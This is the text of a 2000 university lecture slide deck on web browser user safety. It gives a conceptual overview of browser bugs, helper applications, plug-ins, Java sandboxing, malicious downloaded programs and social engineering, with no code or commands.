User Safety

1
User Safety

• CSCE 590 Farkas
• November 20, 2000

2
Attackers

• Want to run programs on other peoples computer
  without their permission to
• Find confidential information
• Release information
• Use it in future attacks
• Compromise system and data
• Deletion/modification of stored information
• Creating new security holes
• Denial-of-service attacks

3
Web Browsers and Security

• Users access information on the Internet
• Web browsers complex pieces of software
• Security problems
• Software bugs
• New features
• Helper applications
• Programmability
• Data-driven attacks
• etc.

4
Software Bugs

• Browser should protect the users from
• Eavesdropping
• Hostile web pages
• Browsers have bugs - Attackers exploit these bugs
  
• Most common attack denial-of-service (browser
  crashes)
• Other attacks (Internet Worm)

5
Netscape Navigator

• 1995-1996 Security evaluation (UCA Berkley and
  Princeton Univ.)
• Problems
• Random number generator
• Java run-time environment
• Applets running on computers behind the firewall
• Applets execute arbitrary machine code
• JavaScript users information sent to other
  sites
• Creating malicious web page to send fake e-mails

6
Helper Applications

• Web browser understand a small and predefined
  set of data types (e.g., ascii, html, gif, jpeg)
• Browser extension helper applications
• Helper applications Special programs that runs
  automatically when other than basic types is
  downloaded
• E.g., Acrobat reader
• Problem helper application runs on the users
  own computer but takes input from the web server

7
Helper Applications

• Malicious helper application may compromise
  users computer
• Downloading helper application
• Authentic copy or
• Compromised version
• Possible consequences total compromise of users
  computer system

8
Helper Applications

• Most powerful application programs (therefore the
  highest security threats)
• Interpreters for general purpose programming
  languages
• Applications containing such languages
• MS Word
• MS Excel
• MS Visual Basic
• Perl
• PostScript interpreter
• etc.

9
Plug-Ins

• Helper applications loaded directly into the web
  browser
• No need to download data
• Data is left in the browsers memory and
  processed directly by the plug-in
• Run automatically
• Not safe

10
Getting Plug-Ins

• Downloaded manually and stored in Netscapes
  directory
• Web browser scans this directory to find plug-ins
• Problem plug-ins precompiled without source code
  and can
• Be malicious (by design)
• Be modified to contain malicious code
• Have bugs that can be exploited
• Implement a general purpose programming language
  that can be misused

11
Programmability

• Need flexibility to download and run program on
  users machine
• Languages Java, JavaScript, Visual Basic Script,
  Macromedias Shockwave, MSs ActiveX

12
Java

• Java design 1991consure electronics controlled
  remotely using a common language (Sun
  Microsystems)
• Compact, portable and reliable language
• Programs compiled onto an interpreted byte code
  and run on a virtual machine
• Java used widely to write programs downloaded
  and interpreted over the internet
• Java virtual machine

13
Java Security

• Java was designed to download from manufacturer
  or approved content provider
• Users protection from malicious and poorly
  written programs?
• Limits what downloaded programs can do -gt Sandbox
  (virtual space)
• Security manager class special classes that
  allow Java program within a sandbox to
  communicate with the outside world
• Class loader examines correctness of run-time
  system
• Bytecode verifier downloaded bytecode was
  generated from valid source code

14
Java Security Policy

• Java
• General purpose language
• Used to download applications from web
• Original security approach
• Do not run Java programs
• Run Java programs with different privileges based
  on the source of program
• No restriction of Java programs

15
Downloading machine codes

• Highest security risk download program from
  Internet and run it.
• Personal computers OS do not limit program
  execution
• Software bugs
• Malicious code
• Program runs with the privilege of the user who
  invoked it

16
Download Programs

• Card Shark 1996 First Virtual Holdings
• Appeared to be a screensaver
• Also it was waiting for credit card numbers
• Post credit card number on the Internet
• Long distance phone calls scam

17
Malicious Programs

• Spend your money
• One of the first cases was the pornography viewer
  international long distance calls
• Electronic fund transfer quicken, 1997
• Violate privacy
• Downloaded program can scan local computer for
  sensitive data then send data by
• E-mail (plain or encrypted)
• http
• Encode in public data
• Posted in Internet
• etc.

18
Improved Security

• Use trusted vendors
• Good reputation
• High security requirements
• Bug free software
• Ensure that downloaded software is original
• Minimize the privileges of downloaded software

19
Data-Driven Attacks

• Attacker give malicious data to application -gt
  undesirable results
• Type of attack is determine from downloaded data
• E.g., unsafe application program and malicious
  data
• Viruses
• Deletion of files

20
Data-Driven Attacks

• Social engineering
• Ask user for sensitive information
• Usually users
• Trust computer systems
• Follow instructions